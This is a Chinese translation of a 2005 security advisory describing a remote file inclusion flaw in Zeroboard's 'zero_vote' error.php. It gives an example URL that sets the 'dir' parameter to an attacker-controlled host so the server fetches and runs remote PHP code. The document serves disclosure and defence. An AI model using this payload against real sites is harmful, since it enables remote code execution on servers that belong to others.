[翻译]Zeroboard 'zero_vote'包含文件漏洞导致远程用户执行任意命

翻译网站:http://www.bnso.net

翻译：Z.C.Y[B.C.T]

安全公告：1012812
资料来源：http://securitytracker.com/id?1012812
CVE  参考：GENERIC-MAP-NOMATCH
发布日期：2005-1-9
发布作者："Optik4Lab"  <optik4lab@gmail.com>
漏洞影响：执行任意代码  用户进入系统
影响系统：Linux  (Any),  UNIX  (Any),  Windows  (Any)
漏洞利用程序包含：是
厂商站点：http://www.nzeo.com/?channel=zeroboard
漏洞起因：Access控制错误  输入合法性错误

漏洞描述：Optik4Lab发现在Zeroboard的&#39;zero_vote&#39;中存在输入合法性漏洞，导致远程用户可以在目标系统上执行任意命令。
在&#39;dir&#39;参数中的&#39;error.php&#39;脚本对用户的输入验证不严。远程用户可以精心构造一个URL导致任意PHP代码从远程位置到被目标系统包含
并执行。

PHP代码包括操作系统命令都是以目标网站服务的权限运行。

示例：      http://[target]/zeroboard/skin/zero_vote/error.php?dir=http://[attacker]
原始资料：http://www.optik4lab.com/modules/news/article.php?storyid=13

解决方法：目前厂商还没有提供补丁或者升级程序